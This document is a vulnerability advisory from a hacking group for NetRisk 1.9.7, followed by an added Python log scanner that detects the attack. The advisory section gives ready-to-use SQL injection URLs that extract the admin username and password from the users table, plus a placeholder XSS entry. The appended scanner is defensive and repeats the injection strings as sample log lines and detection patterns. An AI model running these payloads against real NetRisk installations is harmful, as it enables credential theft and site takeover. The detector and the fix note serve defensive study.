
netrisk 1.9.7 Multiple Remote Vulnerabilities (sql injection/xss)






   ####################################################################
   #                                                                  #
   #  ...:::::netrisk 1.9.7 Multiple Remote Vulnerabilities::::....  #
   #                        (sql injection/xss)                       #
   ####################################################################

Virangar Security Team

www.virangar.org
www.virangar.net

--------
Discovered By : virangar security team
(hadihadi)
---------------------------------
special tnx to:MR.nosrati,black.shadowes,MR.hesy,satan,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
------------------------------------

vulns:

1. SQL injection:
get admin login name:
http://site.com/patch/index.php?page=profile&pid=-1/**/union/**/select/**/1,2,login,4,5,6,7,8,9,10,11/**/from/**/users/**/where/**/id=1/*
---
get admin pass:
http://site.com/patch/index.php?page=profile&pid=-1/**/union/**/select/**/1,2,pass,4,5,6,7,8,9,10,11/**/from/**/users/**/where/**/id=1/*
########################
2. XSS:
http://site.com/patch/index.php?page=

########################
NetRisk contains other SQL injection/XSS/LFI bugs in other pages ;)
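
A log check for the two parameters named in this advisory, added here as an example and not part of the original advisory or of NetRisk itself: it flags index.php requests whose pid is not an integer or whose page is not a plain token, and replaces SQL comments with spaces first so that union/**/select is caught by a whitespace-based signature. The log lines are constructed, and the accepted formats for pid and page are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines for illustration; not taken from a real server.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2009:10:00:00 +0000] "GET /patch/index.php?page=profile&pid=42 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Jan/2009:10:00:07 +0000] "GET /patch/index.php?page=profile&pid=-1/**/union/**/select/**/1,2,login,4/**/from/**/users/* HTTP/1.1" 200 4980',
    '10.0.0.9 - - [01/Jan/2009:10:00:09 +0000] "GET /patch/index.php?page=profile&pid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1 HTTP/1.1" 200 4980',
    '10.0.0.7 - - [01/Jan/2009:10:01:00 +0000] "GET /patch/index.php?page=%3Cb%3Ex&pid=7 HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
PID_RE = re.compile(r'[0-9]+')           # assumption: pid is a numeric row id
PAGE_RE = re.compile(r'[A-Za-z0-9_-]+')  # assumption: page is a short module name
SQL_COMMENT_RE = re.compile(r'/\*.*?\*/|/\*.*$', re.S)
UNION_SELECT_RE = re.compile(r'\bunion\s+(?:all\s+)?select\b', re.I)

def normalise(value):
    """Replace SQL comments (closed or left open) with a space."""
    return SQL_COMMENT_RE.sub(' ', value)

def classify(line):
    """Return the findings for one log line; an empty list means nothing to report."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith('/index.php'):
        return []
    params = parse_qs(url.query, keep_blank_values=True)  # also percent-decodes
    findings = []
    for value in params.get('pid', []):
        if not PID_RE.fullmatch(value):
            hit = UNION_SELECT_RE.search(normalise(value))
            findings.append('pid: UNION SELECT' if hit else 'pid: not an integer')
    for value in params.get('page', []):
        if not PAGE_RE.fullmatch(value):
            findings.append('page: unexpected characters')
    return findings

def scan(lines):
    """Map line index to findings, keeping only lines that produced at least one."""
    results = {i: classify(line) for i, line in enumerate(lines)}
    return {i: f for i, f in results.items() if f}

if __name__ == '__main__':
    for index, findings in scan(SAMPLE_LOG).items():
        print(index, findings)
```

The same integer-only rule for pid, enforced in the application before the value reaches the query, is what closes the hole; the log check only shows who has been probing it.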